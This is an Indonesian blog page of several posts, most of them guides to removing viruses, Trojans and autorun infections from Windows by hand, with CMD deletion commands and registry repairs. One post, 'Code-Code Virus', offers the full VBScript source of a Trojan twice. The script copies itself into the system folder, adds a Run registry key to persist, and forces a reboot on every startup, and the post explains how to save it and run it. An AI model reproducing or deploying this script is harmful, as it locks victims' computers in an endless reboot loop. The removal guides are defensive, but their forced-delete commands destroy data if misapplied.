Electronic currency exchanger list Belajar Bersama

Tuesday, 7 January 2014

Cara MEnghapus Paksa File Yang Terinfeksi Virus Dari CMD

22:29
Cara paling ampuh, meski sedikit rumit, untuk menghapus file yang terinfeksi Trojan, Virus dan Malware adalah menggunakan Command Prompt.
Begini langkahnya:
1. Buka Command Prompt dari Start menu, lalu Run, ketikkan cmddan tekan Enter atau klik Start > Accessories > Command Prompt.
2. Masukkan perintah berikut ke command line:


DEL /F /Q /A C:\Users\UserName\Desktop\file name.
 
 
 
Penjelasan:
Perintah DEL untuk menghapus.
/F untuk memaksa agar system menghapus.
/Q untuk menjalankan mode penghapusan tanda konfirmasi.
/A untuk file dengan attribut (misalnya: file hidden, file read-only).
C:\dst. adalah lokasi direktori.
 
 
Contoh jika file yang terinfeksi bernama datadeni.docx, perintah command line-nya adalah:
DEL /F /Q /A C:\Users\DeniMulyadi\Desktop\datadeni.docx
Jika kamu ingin menghapus direktori, gunakan perintah command line berikut:
RD /S /Q C:\Users\DeniMulyadi\Desktop\Nama Folder
Perintah RD akan menghapus direktori, /S menghapus semua file dan sub folder dan /Q menghapus tanpa konfirmasi.
Metode yang sama juga bisa kamu lakukan untuk menghapus file dan folder pada umumnya.
 
Semoga Bermanfaat
salam dari saya Backdoor Sakit hati (1mp4ct_404()

Code-Code Virus

22:22
Berikut adalah code virus dari saya:

code pertama

 set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2?)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function


cara menggunakanya simpan ke dalam Notepad dan simpan dengan nama misalnya trojan.vbs. existensi all file. ingat akhiranya harus vbs.

code kedua

rem - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData

set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)

createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB",sysDir&"\dlRB.vbs"

sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub

set generateCopy=FSobj.CreateTextFile(sysDir+"\dlRB.vbs")
generateCopy.close

set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")

set procreateCopy=FSobj.OpenTextFile(sysDir+"\dlRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem()

function setFile()
fileData="rem - ^dlRB^ by D.L." &vbcrlf& _
"strComputer = ^.^ " &vbcrlf& _
"Set objWMIService = GetObject(^winmgmts:^ _ " &vbcrlf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)" &vbcrlf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ " &vbcrlf& _
"(^Select * from Win32_OperatingSystem^)" &vbcrlf& _
"For Each objOperatingSystem in colOperatingSystems" &vbcrlf& _
"ObjOperatingSystem.Reboot()" &vbcrlf& _
"Next"
end function

function rebootSystem()
strComputer = "."

Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Shutdown)}!\\" & strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function


cara menggunakanya simpan ke dalam Notepad dan simpan dengan nama misalnya virus.vbs. existensi all file. ingat akhiranya harus vbs.

NOTE: Jangan pernah menjalankan virus tersebut di Laptop atau Komputer Ente karena bisa fatal akibatnya.

Sekian dari saya
Salam dari saya Backdoor Sakit Hati (1mp4ct_404)

Cara Menhapus Virus Autorun Secara Manual

22:17
Virus autorun.inf memang cukup mengerikan karena saat sobat mencoba untuk mencolokan flashdisk ke komputer sobat maka dengan hitungan detik maka fungsi autorun dari virus tersebut langsung masuk dan komputer sobat saat itu juga langsung terinfeksi. Untuk sobat yang belum mematikan fungsi autorun dari windows, sobat bisa mencoba langkah berikut ini:
 
Cara Pertama
Start - Run - tulis "gpedit.msc" (tanpa tada petik) - User Configuration - Administrative Templates - Windows Components - Autoplay Policies - Turn Off Autoplay (double klik) - Ceklist Enable - dan pilih all drives - OK / Apply
 Cara Kedua

berikut ini :
1. Booting komputer dengan safe mode atau biasanya dengan menekan F8
2. Jalankan aplikasi dari bawaan windows, Command Prompt atau CMD (Start - Run - cmd.exe)
3. Ketikan drive USB tersebut (misalnya G: kemudian tekan [Enter])

4. Ketikan ATTRIB -R -A -S -H AUTORUN.INF, kemudian tekan [Enter]

5. Ketikan DEL AUTORUN.INF, kemudian tekan [Enter]

Setelah selesai, komputer dapat di Restart dalam mode Normal.

Penjelasan:

ATTRIB adalah modul yang dipergunakan untuk mengubah atribut sebuah file.

-R yaitu perintah untuk menghilangkan mode “Read Only

-A yaitu perintah untuk menghilangkan mode “Archive

-S yaitu perintah untuk menghilangkan mode “System

-H yaitu perintah untuk menghilangkan mode “Hidden

DEL yaitu perintah untuk menghapus file

Semoga Bermanfaat
Salam Dari Saya Backdoor Sakit Hati (1mp4ct_404)

Cara menghapus Virus Trojan: W32/VBTroj.VNE (Rieysha)

22:10
Untuk pembersihan kali ini, kita akan menggunakan software Mini PE, silahkan download tools tersebut di alamat www.minipe.org, kemudian burn ke CD dan booting komputer dengan menggunakan CD tersebut. Setelah berhasil booting dengan menggunakan CD tersebut lakukan langkah pembersihan selanjutnya.
1. Hapus file virus di drive
Gunakan tools [Windows explorer] untuk memudahkan dalam mencari dan menghapus file induk virus.
- Klik [miniPE2XT]
- Klik [Programs]
- Klik [File Management]
- Klik [Windows Explorer]
Kemudian hapus file berikut:
o [C:\] atau Drive lain termasuk Flash disk
o C:\Windows
o C:\Windows\system32
o C:\Documents and Settings\%user%\Application Data%angka%Admin.exe
[Contoh: Application Data90Admin.exe]
o C:\Documents and Settings\%user%\Local Settings\Application Data%angka%r13y5h4ku.exe
[Contoh: Application Data90r13y5h4ku.exe]
o C:\Documents and Settings\%user%\Start Menu\Programs\Startup%angka%AVG Test Center.exe
[Contoh: Startup90AVG Test Center.exe] 26 files
o C:\Documents and Settings\win321.exe
o C:\WINDOWS\Web\Printers\Write.exe
o C:\WINDOWS\Web\download.exe
o C:\Windows\Cursors\newCursor.exe
o C:\Windows\Debug\adminMode.exe
o C:\Windows\Font\rieyshaTrueType.exe
o C:\Windows\Help\userhelping.exe
o C:\Windows\java\packet.exe
o C:\Windows\Media\newmedia.exe
o C:\Windows\msagent\agentkvr.exe
o C:\Windows\registration\registy.exe
o C:\Windows\repair\setup.exe
o C:\windows\tasks\newScedule.exe
o C:\windows\system32\win34.exe
o C:\WINDOWS\system\oeminfo.exe
o C:\Windows\softwaredistribution\downloads.exe
o C:\Program Files\Internet Explorer
hacker.exe
IEfree.exe
Catatan:
Hapus file virus yang mempunyai ciri-ciri:
- Menggunakan icon
- Ukuran 228 KB
- Type file “Application”
- Ekstensi EXE
Untuk mempercepat pencarian sebaiknya menggunakan tools pencarian [Search], caranya:
- Buka [Windows Explorer]
- Klik tombol [Search]
- Pada kolom “Search for files or folders names” isi dengan format *.exe
- Pada kolom “Look in:” pilih drive yang akan di periksa
- kKik opsi [Search Options >>]
- Pilih opsi “Size”
? Pilih “At most”
? Isi 229
- Klik opsi “Advanced Options”
? Pilih opsi “Search System folders”
? Pilih opsi “Search hidden files and folders”
? Pilih opsi “Search subfolders”
- Klik tombol “Search Now” untuk memulai pencarian
- Kemdian hapus file virus yang berhasil ditemukan sesai dengan ciri-ciri yang telah disebutkan di atas.
Hapus juga file berikut:
- C:\CeweNakal.scr
- C:\Windows
? Oemlogo.pif
? TAKSMAN.com
? system32folder.htt
? system32desktop.ini
? system32pesan_dari_rieysha.txt
? system32pesan.doc
? system32Autorun.inf
? system32pesanku.bat
? system32pesanQ.htm
? system32klikAku.bat
? system32klik2kali.bat
? system32rieysha.jpg
- D:\Puisi.txt
2. Hapus/edit kembali registry yang sudah diubah virus
o Masih di Mini PE, klik
o Klik MiniPE2XT]
o Klik [Programs]
o Klik [Avast! Registry Editor]
o Klik [Registry Editor]
o Setelah muncul layar [Select File With Registry], klik tombol [Load selected OS registry], jika muncul layar konfirmasi, klik tombol [OK] (lihat gambar)
o Kemudian cari dan ubah registry berikut:
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
? Klik 2x pada string [Shell], kemudian pada kolom “string value data” ubah menjadi [explorer.exe], Kemudian klik tombol [OK]
? Klik 2x pada string [Userinit], kemudian pada kolom “string value data” ubah menjadi [%System%:\userinit.exe,], Kemudian klik tombol [OK]
Catatan:
%system% ini berbeda-beda:
• [C:\Windows\system32] ? Windows XP/2003
• [C:\Winnt\system32] ? Windows 2000
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Run
? Hapus string [r13y5h4.exe]
- _LOCAL_MACHINE_SYSTEM\ControlSet001\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SYSTEM\ControlSet002\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SYSTEM\CurrentControlSet\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, kemudian hapus string berikut:
? Explorer
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:
? NoClose
? NoDrives
? NoDriveTypeAutoRun
? NoFind
? NoFolderOptions
? NoRun
? NoStarMenuMorePrograms
? NoViewOnDrive
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:
? DisableCMD
? DisableRegistryTools
? DisableTaskMgr
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:
? NoCLose
? NoControlPanel
? NoDrives
? NoFind
? NoFolderOptions
? NoLOgoff
? NoRun
? NoSetFolders
? NoTrayContextMenu
? NoViewOnDrive
? NoWindowsUpdate
? StartMenuLogOff
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:
? NoDispCPL
? DisableRegistryTools
? DisableTaskMgr
- _LOCAL_MACHINE_SOFTWARE\Microsoft\WindowsNT
? Pada string [RegisteredOrganization] ubah “string value data” sesuai dengan keinginan Anda
? Pada string [RegisteredOwner] ubah “string value data” sesuai dengan keinginan Anda
- _USER_%user%Software\Microsoft\Windows\CurrentVersion\Run
? Hapus string [r13y5h4.exe]
- _User_%user%\Software\Microsoft\Internet Explorer\Main
? Pada string [Start Page] ubah “string value data” menjadi [about:blank]
- _User_%user%\Control Panel\International
? Pada string [s1159] ubah “String value data” menjadi [AM]
? Pada string [s2359] ubah “string value data” menjadi [PM]
3. Restart komputer
4. Fix ulang registry untuk memastikan semua registry sudah di perbaiki, silahkan copy script dibawah ini pada program “notepad” kemudian simpan dengan nama repair.inf
Catatan
Jalankan file repair.inf ini setelah komputer restart
Berikut script yang harus di copy
[Version]
Signature=”$Chicago$”
Provider=Vaksincom Oyee
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”””%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKCU, Control Panel\Desktop, Wallpaper,0,
HKCU, Software\Microsoft\Internet Explorer\Main, Start Page,0, “about:blank”
HKCU, Control Panel\International, s1159,0, “AM”
HKCU, Control Panel\International, s2359,0, “PM”
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SOFTWARE\Classes\exefile,,,application
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOrganization,0, “Organization”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOwner,0, “Owner”
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0×000000ff,255
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0×000000ff,255
[del]
HKCU, Softawre\microsoft\Windows\currentVersion\Run, r13y5h4.exe
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies, explorer
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRecentDocsMenu
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoTrayContextMenu
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoViewContextMenu
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStarMenuMorePrograms
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoControlPanel
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFind
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFolderOptions
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoLogoff
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoRun
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoSetFolders
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoTrayCOntextMenu
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoWindowsUpdate
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStartMenuLogoff
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,NoDispCPL
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableRegistryTools
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableTaskMgr
HKCU, Software\Microsoft\Internet Explorer\Main, Window Title
5. Restart komputer, kemudian login tanpa menggunakan CD Mini PE
6. Jalankan repair.inf untuk membersihkan registry yang sudah di buat/diubah oleh virus caranya:
o Klik kanan repair.inf
o Klik Install
7. Untuk pembersihan optimal dan mencegah infeksi ulang, silahkan scan dengan antivirus yang up-to-date atau dengan menggunakan removal tools. Anda dapat menggunakan Normal Malware Cleaner dengan mendownload di alamat berikut:
http://www.norman.com/support/support_tools/58732/en

Semoga bermanfaat
salam dari saya Backdoor Sakit Hati (1mp4ct_4040

MEMBERSIHKAN KOMPUTER DARI VIRUS SECARA MANUAL

22:04
Virus komputer adalah sebuah program yang dirancang untuk mengganggu atau merusak sistem komputer dengan analogi seperti virus yang sebenarnya dimana sebuah virus dapat menginfeksi dan menular kepada komputer yang lainnya dengan berbagai cara.
Jenis-jenis Virus Komputer
Virus komputer dikategorikan dari cara kerjanya
  • Worm – merupakan program yang diam-diam menginstallkan dirinya ke dalam komputer ketika pengguna sedang membuka laman-laman tertentu di Internet.
  • Trojan – merupakan program yang menginjeksikan dirinya ke dalam sebuah program baik-baik, yang mengakibatkan Trojan tersebut aktif di memori ketika program inang tersebut dijalankan oleh pengguna.
  • Hacking – merupakan serangan langsung dari hacker terhadap komputer pengguna yang mengakses laman internet tertentu, dengan atau tanpa program bantuan yang telah disisipkan di komputer pengguna.
  • Backdoor – merupakan program pencuri data-data pribadi dari user, dan secara diam-diam mengirimkannya kepada sang pembuat virus.
  • Spyware, Malware, dan Adware – merupakan program yang didesain untuk menjejali komputer pengguna dengan promosi-promosi yang mengganggu.
  • Rogue dan Ransomware – merupakan program yang meniru program antivirus dan menampilkan aktivitas layaknya antivirus normal, dan memberikan peringatan-peringatan palsu tentang adanya virus. Tujuannya adalah agar pengguna membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue tersebut.
  • Virus Telepon Seluler – merupakan virus yang khusus berjalan di telepon seluler, dan dapat menimbulkan berbagai macam efek, mulai dari merusak telepon seluler, mencuri data-data di dalam telepon seluler, sampai membuat panggilan-panggilan diam-diam dan menghabiskan pulsa pengguna telepon seluler.   
  • Membersihkan Virus Secara Manual
  • Matikan fasilitas autorun pada komputer. Caranya sudah saya bahas di artikel sebelumnya
  • Tampilkan Hidden Files
  • Tampilkan ekstensi tiap file dengan cara hilangkan tanda centang pada windows eksplorer Folder Option > Hide Extensions for known file types
  • Tampilkan juga file system yang ada dengan cara menghilangkan tanda centang pada windows eksplorer Folder Option > Hide protected operating system files
  • Masuk kedalam safe mode dengan cara menekan F8 pada saat booting (menyalakan) komputer
  • Lakukan pencarian pada setiap partisi hard disk dengan mengetikkan *.exe, *.bat, *.vbs.
  • Analisa file yang telah di temukan dengan ketentuan sebagai berikut
  1. Lihat filenya jika berlogo folder dan memiliki nama yang sama dengan file atau salah satunya tetapi berekstensi *.exe langsung delete saja karena sudah dipastikan itu virus
  2. Coba periksa file yang berekstensi *.vbs. Apakah file tersebut merupakan salah satu dari file yang kita miliki atau bukan.
  3. Coba periksa juga file yang berekstensi *.bat. Apakah file tersebut termasuk sebagai salah satu file system windows.
  4. Periksa ukuran filenya apakah ada beberapa file yang memiliki ukuran yang kecil namun nama yang berbeda.
CATATAN : Bagi anda yang belum bisa untuk menganalisa hasil pencarian tersebut maka disarankan anda untuk sangat berhati – hati dalam menghapus file.

Semoga bermanfaat
salam dari saya Backdoor Sakit Hati (1mp4ct_404)

Cara Mematikan Autorun

22:00
File Autorun adalah sebuah file yang diguanakan untuk menjalankan sebuah file yang di tunjuk saat anda memasukkan sebuah CD atau USB Flash Drive (UFD). Misalnya saat anda ingin menginstall driver dari PC anda. Anda perlu mamasukkan CD drivernya. Driver yang anda butuhkan akan berjalan otomatis tanpa perlu anda klik apa2.
Namun pemanfaatan autorun ini juga dimanfaatkan oleh virus untuk menginfeksi komputer yang di masukkan UFD.
Untuk itu alangkah baiknya jika anda me-nonaktifkan fungsi dari autorun ini.
Ada dua cara yang bisa anda gunakan untuk me-non aktifkan fungsi dari autorun ini namun anda cukup melakukan salah satu cara saja.

1. Disable Autorun/Autoplay melalui registry, caranya:
  • Buka Registry Editor Klik menu [Start] –[ Run | pada dialog box RUN ketik regedit
  • Browse ke alamat registry berikut :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

  • Kemudian klik kanan pada string NoDriveTypeAutoRun (jika pada alamat tersebut tidak ditemukan maka buat saja Dword baru)
  • Isi value data dengan ff yang berarti fungsi Aturun/Autoply akan di matikan pada 255 drive
  • Klik Tombol [OK] dan Restart komputer agar perubahan ini berjalan
2. Disable Autorun/Autoplay melalui Group Policy [GPEDIT.MCS], caranya:
  • Klik menu [Start] –[ Run | pada dialog Ketik GPEDIT.MSC
  • Setelah muncul layar “Group Policy” klik folder “System” pada menu “User Configuration” dan “Computer Configuration
  • Pada kolom Settings, klik dua kali “Turn off Autoplay”Interface Group Policy “User Configuration” Interface Group Policy “Computer Configuration”
  • Setelah muncul layar “Turn off Autoplay” properties, klik tabulasi [Settings] dan pilih opsi “Enable” pada menu “Turn off Autoplay” kemudian Pilih “All Drive” pada kolom “Turn off Autoplay on” Kemudian klik tombol “OK”
  • Klik “Close” untuk keluar dari layar “Group Policy”
  • Agar perubahan berjalan maka Restart komputer
Selamat mencoba, semoga bermanfaat :D
Salam dari saya Backdoor Sakit Hati (1mp4ct_404)

Cara AMPUH Membasmi Dan Mengatasi Virus Ganas

21:58
Cara Membasmi Virus Trojan – Trojan, seperti namanya, berwujud seperti program-program yang menarik dan dibutuhkan, seperti archiver, image-viewer, ato game-game kecil, namun ketika program tersebut dijalankan maka akan menjalankan sub-program yang ada didalamnya, bayangkan kalo sub-programnya bisa mencuri data penting perusahaan, bahaya kan? makanya jangan sekali-sekali maen game atau men-download dan menjalankan program yang aneh-aneh di internet, apalagi dari situs pembajak, Trojan? Trojan adalah salah satu jenis virus yang mencuri informasi berharga dari komputer yang terinfeksi karena ulah virus tersebut seperti password, nomor kartu kredit, serta informasi penting lain sesuai keinginan si pembuat virus tersebut. Virus trojan sangat ganas dan ini lebih berbahaya dari virus biasa lainnya, Sialnya virus ini sangat sulit dibasmi meskipun menggunakan antivirus terkenal. Norton Antivirus yang sudah diupdate virus signaturenya memang berhasil mengenali virus ini, namun gagal menghapusnya. Symantec Trojan.Vundo Removal Tool, AVG dan AVG Antispyware juga mengalami nasib yang sama.

Membasmi virus ini sangat mudahdan memang tidak sulit. Langsung saja Ikuti langkah – langkah Cara Membasmi Virus Trojan berikut :
  1. Booting PC dengan menggunakan CD instalasi Windows XP
  2. Setelah menu muncul, tekan R ( Recovery Console ).
  3. Lalu sobat Tekan angka yang sesuai nomor partisi Windows, biasanya 1 ( di C:\Windows ).
  4. Berturut-turut ketikkan perintah berikut pada layar command : 
chdir system32 dir nafmhhti.dll ( Windows akan menampilkan file tersebut yaitu file virus yang masih bercokol di sistem ) del nafmhhti.dll ( menghapus file tersebut, hal ini tidak bisa dilakukan jika Windows di boot dalam keadaan normal maupun safe mode ) attrib -s -h nafmhhti.dllbox (merubah attribut file nafmhhti.dllbox supaya dapat dihapus) del nafmhhti.dllbox (menghapus file nafmhhti.dllbox) exit (merestart windows, keluarkan CD instalasi Windows XP).
  1. Setelah windows restart, masuklah ke command prompt untuk memastikan bahwa file nafmhhti.dll telah benar-benar terhapus, caranya :
    1. Klik Start > Run
    2. Ketik cmd, tekan Enter, lalu pada layar command prompt ketik command berikut
        cd c:\windows\system32
        dir nafmhhti.dl
        dir nafmhhti.dllbox
  2. Pastikan bahwa kedua file tersebut tidak ditemukan Windows, artinya proses penghapusan telah berhasil.
  3. Selanjutnya membersihkan registry Windows. Langkahnya :
    1. Klik Start > Run
    2. Ketik regedit, tekan Enter
    3. Klik My Computer, tekan F3
  4. Lalu ketiklah nafmhhti.dll pada box Search.
  5. Hapuslah entri-entri registri yang dtemukan untuk file tersebut. Entri bercokol di ( Default ) dengan Value c:\windows\system32\nafmhhti.dll.
  6. Anda tidak perlu menghapus folder induk entri tersebut, cukup hapus saja entri (Default) tadi.
  7. Restart komputer.
  8. Insya Allah virus telah musnah.
Semoga Bermanfaat
Salam Dari Saya Backdoor Sakit Hati (1mp4ct_404)